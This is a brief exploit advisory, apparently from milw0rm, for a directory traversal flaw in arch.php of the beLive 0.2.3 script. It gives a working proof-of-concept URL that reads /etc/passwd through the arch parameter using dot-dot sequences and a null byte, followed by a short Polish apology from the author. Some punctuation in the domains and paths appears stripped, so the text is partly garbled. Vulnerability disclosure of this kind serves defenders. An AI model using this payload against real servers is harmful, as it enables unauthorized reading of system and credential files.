Directory traversal vulnerability in arch.php in beLive 0.2.3 allows remote malicious users to read arbitrary files via a .. (dot dot) in the arch parameter.
Author: Kacper
Email: kacper1964@yahoopl
HomePage: devilteampl/
---------------
Script: beLive version: v023
Vuln:
[page]pl/belive/archphp?arch=////////etc/passwd%00
sorry ze tak malo napisane ale nie bylo czasu, wiecej na devilteampl/
THE END
-----------------------------------------
# milw0rmc ...